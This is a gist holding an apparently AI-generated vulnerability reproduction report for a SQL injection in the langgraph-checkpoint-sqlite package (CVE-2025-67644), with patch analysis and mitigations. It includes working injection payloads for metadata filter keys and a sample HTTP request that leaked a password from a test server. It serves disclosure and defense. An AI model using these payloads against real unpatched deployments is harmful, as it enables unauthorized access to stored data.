@N3mes1s
Created December 10, 2025 21:05
SQL Injection in LangGraph SQLite Checkpointer - CVE-2025-67644

Report Date: December 10, 2025
Advisory ID: GHSA-9rwj-6rc7-p77c
Reproduction Status: ✅ CONFIRMED


Executive Summary

A high-severity (CVSS 7.3) SQL injection vulnerability, tracked as CVE-2025-67644, was identified and reproduced in the langgraph-checkpoint-sqlite package. An attacker who controls metadata filter keys can bypass access controls and exfiltrate sensitive data from LangGraph checkpoint storage, because those keys are interpolated into SQL without validation.

Key Finding: Exploitation confirmed - private checkpoint data including passwords was successfully leaked via SQL injection payloads.


Vulnerability Details

| Attribute | Value |
|---|---|
| Package | langgraph-checkpoint-sqlite |
| Ecosystem | PyPI (Python) |
| Vulnerable Versions | < 3.0.1 |
| Patched Version | 3.0.1 |
| Severity | HIGH |
| CVSS Score | 7.3 |
| CWE | CWE-89: SQL Injection |
| Fix Commit | 297242913f8ad2143ee3e2f72e67db0911d48e2a |

Technical Analysis

Root Cause

The vulnerability exists in the _metadata_predicate() function within langgraph/checkpoint/sqlite/utils.py. The function constructs SQL queries by directly interpolating metadata filter keys into f-strings without validation:

# VULNERABLE CODE (< 3.0.1)
def _metadata_predicate(metadata_filter: dict) -> tuple[Sequence, Sequence[Any]]:
    predicates = []
    param_values = []

    for query_key, query_value in metadata_filter.items():
        operator, param_value = _where_value(query_value)
        predicates.append(
            f"json_extract(CAST(metadata AS TEXT), '$.{query_key}') {operator}"
            #                                          ^^^^^^^^^^
            #                          UNSANITIZED USER INPUT INTERPOLATED
        )
        param_values.append(param_value)

    return (predicates, param_values)

Filter values are passed as bound parameters, but filter keys are pasted into the SQL text verbatim, so parameterization gives them no protection.

Attack Vector

An attacker controlling metadata filter keys can break out of the JSON path literal and inject arbitrary SQL:

Malicious Key: x') = ? OR 1=1 --

Generated SQL (simplified):

SELECT * FROM checkpoints
WHERE json_extract(CAST(metadata AS TEXT), '$.x') = ? OR 1=1 -- ') = ?

The injection:

  1. Closes the JSON path string with ' and the json_extract() call with )
  2. Supplies its own = ? so the single bound value is still consumed and the parameter count matches
  3. Adds OR 1=1 to create a tautology (always true)
  4. Comments out the rest of the original predicate with --
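
The four steps can be reproduced outside LangGraph with the standard-library sqlite3 module. The sketch below is not the library's code: the `checkpoints` table layout, `vulnerable_predicate`, and `query` are hypothetical stand-ins that only mirror the f-string shown earlier, and it assumes the local SQLite build includes the JSON functions.

```python
import json
import sqlite3


def vulnerable_predicate(key: str) -> str:
    # Same shape as the vulnerable f-string: the key lands in the SQL text.
    return f"json_extract(CAST(metadata AS TEXT), '$.{key}') = ?"


def query(conn: sqlite3.Connection, key: str, value: str) -> list[dict]:
    sql = (
        "SELECT CAST(metadata AS TEXT) FROM checkpoints "
        f"WHERE {vulnerable_predicate(key)}"
    )
    # Only the value is bound; the key has already become part of the SQL.
    return [json.loads(row[0]) for row in conn.execute(sql, (value,))]


# Hypothetical stand-in for the checkpoint table: one metadata blob per row.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE checkpoints (id INTEGER PRIMARY KEY, metadata BLOB)")
conn.executemany(
    "INSERT INTO checkpoints (metadata) VALUES (?)",
    [
        (json.dumps({"access": "private", "password": "super-secret"}).encode(),),
        (json.dumps({"access": "public"}).encode(),),
    ],
)

benign = query(conn, "access", "public")
injected = query(conn, "x') = ? OR 1=1 -- ", "dummy")

print(len(benign), "row(s) for the benign key")
print(len(injected), "row(s) for the injected key")
```

With the benign key only the public row matches. With the injected key the tautology makes every row match, including the one holding the password.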

Exploitation Requirements

  • Application must expose checkpoint query functionality
  • Attacker must control metadata filter keys (not just values)
  • Target must use SqliteSaver checkpointer

Reproduction Results

Environment

  • Platform: Ubuntu 22.04 (Lima VM)
  • Python: 3.10
  • Test Server: FastAPI with uvicorn

Tested Payloads

| # | Payload | Purpose |
|---|---|---|
| 1 | x') = ? OR 1=1 -- | Boolean tautology bypass |
| 2 | x') = ? UNION SELECT 1 -- | Union-based injection |
| 3 | x') = ? OR json_extract(CAST(metadata AS TEXT), '$.access') IS NOT NULL -- | Nested function injection |

Results Matrix

| Payload | Vulnerable (3.0.0) | Patched (3.0.1) |
|---|---|---|
| #1 - OR 1=1 | EXPLOITED - Both checkpoints returned, password leaked | ❌ BLOCKED - HTTP 500, ValueError |
| #2 - UNION | ⚠️ SQL Error (proves injection control) | ❌ BLOCKED - ValueError |
| #3 - Nested | EXPLOITED - Both checkpoints returned | ❌ BLOCKED - HTTP 500, ValueError |

Evidence of Exploitation

Vulnerable Version (3.0.0):

// Request
POST /api/history
{"filter_field": "x') = ? OR 1=1 -- ", "filter_value": "dummy"}

// Response - HTTP 200 (LEAKED DATA)
[
  {"access": "private", "data": "secret information", "password": "super-secret"},
  {"access": "public", "data": "public information"}
]

Patched Version (3.0.1):

// Same request returns HTTP 500
ValueError: Invalid filter key: 'x') = ? OR 1=1 -- '.
Filter keys must contain only alphanumeric characters, underscores, dots, and hyphens.

Patch Analysis

Fix Implementation

The patch introduces key validation via regex:

# PATCHED CODE (>= 3.0.1)
import re

_FILTER_PATTERN = re.compile(r"^[a-zA-Z0-9_.-]+$")

def _validate_filter_key(key: str) -> None:
    if not _FILTER_PATTERN.match(key):
        raise ValueError(
            f"Invalid filter key: '{key}'. Filter keys must contain only "
            "alphanumeric characters, underscores, dots, and hyphens."
        )

Additional Hardening

  1. Key Validation: All filter keys validated against [a-zA-Z0-9_.-]+ before use
  2. Parameterized LIMIT: limit parameter now passed as bound parameter instead of interpolated
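
The report does not show the pre-patch LIMIT code, so the following is only an illustrative sketch of why binding the limit matters. Both helper functions and the `checkpoints` table are hypothetical; `list_interpolated` stands in for any code that formats the limit into the SQL string.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE checkpoints (checkpoint_id INTEGER PRIMARY KEY)")
conn.executemany("INSERT INTO checkpoints VALUES (?)", [(i,) for i in range(5)])


def list_interpolated(limit) -> list[int]:
    # Hypothetical pre-patch style: the limit is pasted into the SQL text.
    sql = f"SELECT checkpoint_id FROM checkpoints ORDER BY checkpoint_id LIMIT {limit}"
    return [row[0] for row in conn.execute(sql)]


def list_bound(limit) -> list[int]:
    # The limit travels as a bound value and is never parsed as SQL.
    sql = "SELECT checkpoint_id FROM checkpoints ORDER BY checkpoint_id LIMIT ?"
    return [row[0] for row in conn.execute(sql, (limit,))]


def bound_rejects(limit) -> bool:
    # True when SQLite refuses the bound value instead of running it.
    try:
        list_bound(limit)
    except sqlite3.Error:
        return True
    return False


shifted = list_interpolated("2 OFFSET 3")  # extra SQL rides along with the limit
normal = list_bound(2)
rejected = bound_rejects("2 OFFSET 3")
```

When the limit is interpolated, the string "2 OFFSET 3" changes which rows come back. When it is bound, SQLite treats the same string as a non-integer value and raises an error rather than executing it.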

Patch Effectiveness

Verdict: ✅ EFFECTIVE

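All tested bypass attempts are rejected at the validation layer before any SQL is constructed. A payload can only escape the JSON path literal by closing its quote, and the pattern rejects every character needed to do that or to form SQL syntax afterwards:

  • Quote characters (', ")
  • Whitespace and the = operator, so keywords such as OR and AND cannot be separated into SQL tokens
  • Block comment markers (/*)
  • Parentheses ((, ))

Hyphens are in the allowed set, so a key containing -- still passes validation, but it stays inside the quoted path literal and is never parsed as a comment.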
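
As a quick check, the three tested payloads can be run against the pattern quoted from the patch. This is a minimal sketch: `is_allowed` and the list of benign keys are illustrative names and values, not part of the library.

```python
import re

# Pattern quoted from the patched code shown in this report.
FILTER_PATTERN = re.compile(r"^[a-zA-Z0-9_.-]+$")

payloads = [
    "x') = ? OR 1=1 -- ",
    "x') = ? UNION SELECT 1 -- ",
    "x') = ? OR json_extract(CAST(metadata AS TEXT), '$.access') IS NOT NULL -- ",
]

# Illustrative keys an application might legitimately filter on.
benign_keys = ["access", "user.id", "run-id", "step_1"]


def is_allowed(key: str) -> bool:
    return FILTER_PATTERN.match(key) is not None


rejected = [p for p in payloads if not is_allowed(p)]
accepted = [k for k in benign_keys if is_allowed(k)]

print(f"{len(rejected)}/{len(payloads)} payloads rejected")
print(f"{len(accepted)}/{len(benign_keys)} benign keys accepted")
```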

Impact Assessment

Affected Scenarios

| Scenario | Risk Level |
|---|---|
| Custom server deployments using SqliteSaver | HIGH |
| Applications forwarding user input to checkpoint filters | CRITICAL |
| Internal tools with trusted users | LOW |
| LangSmith hosted deployments | NOT AFFECTED (custom checkpointers not supported) |

Potential Impact

  • Confidentiality: Unauthorized access to all checkpoint data
  • Integrity: Potential for data modification via advanced injection (not demonstrated in this reproduction, which only showed unauthorized reads)
  • Availability: DoS possible via malformed queries

Recommendations

Immediate Actions

  1. Upgrade immediately to langgraph-checkpoint-sqlite >= 3.0.1

    pip install --upgrade "langgraph-checkpoint-sqlite>=3.0.1"

  2. Audit applications for any code paths that forward user input to checkpoint filters

  3. Review logs for suspicious filter key patterns (containing ', --, OR, etc.)
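
The upgrade check and the log review can both be scripted. The sketch below makes two assumptions: version strings are compared on their first three numeric components only (pre-release suffixes are ignored), and filter keys have already been extracted from whatever log format the application uses. All function names are hypothetical.

```python
import re
from importlib.metadata import PackageNotFoundError, version

PATCHED = (3, 0, 1)
SAFE_KEY = re.compile(r"[a-zA-Z0-9_.-]+")  # same character class as the patch


def parse_version(text: str) -> tuple[int, ...]:
    # Keep the first three numeric components; suffixes such as "rc1" are ignored.
    numbers = re.findall(r"\d+", text)[:3]
    numbers += ["0"] * (3 - len(numbers))
    return tuple(int(n) for n in numbers)


def is_vulnerable(version_text: str) -> bool:
    return parse_version(version_text) < PATCHED


def installed_is_vulnerable(package: str = "langgraph-checkpoint-sqlite"):
    # Returns None when the package is not installed in this environment.
    try:
        return is_vulnerable(version(package))
    except PackageNotFoundError:
        return None


def is_suspicious_key(key: str) -> bool:
    # Anything outside the allowlist is worth a closer look in the logs.
    return SAFE_KEY.fullmatch(key) is None


print("installed package vulnerable:", installed_is_vulnerable())
```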

Long-term Mitigations

  1. Input Validation: Enforce allowlist validation at API boundaries, not just the library layer

  2. Defense in Depth: Pass every user-controlled input as a bound parameter rather than interpolating it into SQL text

  3. Security Testing: Add fuzzing tests for filter keys with SQL metacharacters

  4. Error Handling: Return 400 Bad Request instead of 500 for invalid filter keys
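
Items 1, 2 and 4 can be combined in one request handler. The following is a framework-agnostic sketch, not the library's fix: `handle_history`, `find_by_metadata`, and the table layout are hypothetical, and the request field names are borrowed from the reproduction request shown earlier. It relies on the fact that the path argument of SQLite's json_extract() is an ordinary SQL value and can therefore be bound like any other.

```python
import json
import re
import sqlite3

KEY_PATTERN = re.compile(r"[a-zA-Z0-9_.-]+")  # allowlist enforced at the API boundary


def find_by_metadata(conn: sqlite3.Connection, key: str, value) -> list[dict]:
    # Both the JSON path and the value are bound; no user input reaches the SQL text.
    sql = (
        "SELECT CAST(metadata AS TEXT) FROM checkpoints "
        "WHERE json_extract(CAST(metadata AS TEXT), ?) = ?"
    )
    return [json.loads(row[0]) for row in conn.execute(sql, (f"$.{key}", value))]


def handle_history(conn: sqlite3.Connection, body: dict) -> tuple[int, object]:
    key = body.get("filter_field")
    if not isinstance(key, str) or KEY_PATTERN.fullmatch(key) is None:
        # Client error, reported as 400 rather than surfacing as a 500.
        return 400, {"error": "invalid filter_field"}
    return 200, find_by_metadata(conn, key, body.get("filter_value"))


# Hypothetical stand-in for the checkpoint table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE checkpoints (id INTEGER PRIMARY KEY, metadata BLOB)")
conn.executemany(
    "INSERT INTO checkpoints (metadata) VALUES (?)",
    [
        (json.dumps({"access": "private", "password": "super-secret"}).encode(),),
        (json.dumps({"access": "public"}).encode(),),
    ],
)

payload = "x') = ? OR 1=1 -- "
bad_status, _ = handle_history(conn, {"filter_field": payload, "filter_value": "dummy"})
ok_status, ok_rows = handle_history(conn, {"filter_field": "access", "filter_value": "public"})

# Even without the boundary check, the bound path is treated as data, not SQL.
leaked = find_by_metadata(conn, payload, "dummy")
```

The same payload list used in the reproduction makes a natural seed corpus for the fuzzing tests suggested in item 3.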


Artifacts

Generated Files

| File | Description |
|---|---|
| repro/reproduction_steps.sh | Automated bash script for full PoC |
| repro/vuln_server.py | Vulnerable FastAPI server demonstrating the issue |
| repro/rca_report.md | Root cause analysis report |
| repro/patch_analysis.md | Detailed patch effectiveness analysis |
| logs/langgraph_sqlite_*/ | Execution logs with evidence |

Reproduction Command

cd repro && ./reproduction_steps.sh

The script:

  1. Creates isolated virtualenv
  2. Installs vulnerable version 3.0.0
  3. Runs exploitation tests
  4. Upgrades to patched version 3.0.1
  5. Verifies fix blocks all payloads

Timeline

| Date | Event |
|---|---|
| 2025-12-10 | GHSA published |
| 2025-12-10 | Pruva reproduction initiated |
| 2025-12-10 | Vulnerability confirmed exploitable |
| 2025-12-10 | Patch verified effective |
| 2025-12-10 | Security report generated |

Report Metadata

| Field | Value |
|---|---|
| Generated By | Pruva Security Automation |
| Reproduction Time | ~66 minutes |
| Agent Turns | 102 |
| Lima VM | pruva-ghsa-9rwj-6rc7-p77c-langgraph-checkpoint-* |
| Session ID | GHSA-9rwj-6rc7-p77c-LANGGRAPH-CHECKPOINT-SQLITE-SQL-INJECTION-4820c8ab |

This report was automatically generated by Pruva's AI-powered vulnerability reproduction platform.

@cvlabsio

Is pruva available or any details on how you come up with the workflows?

@N3mes1s
N3mes1s commented Dec 11, 2025

@cvlabsio Still working on making it available to the broader public. In short, it is a multi-agent system that ingests a CVE or issue and tries to reproduce it in a sandbox.

@cvlabsio

Thanks and understood. Will wait for the details when fully released.
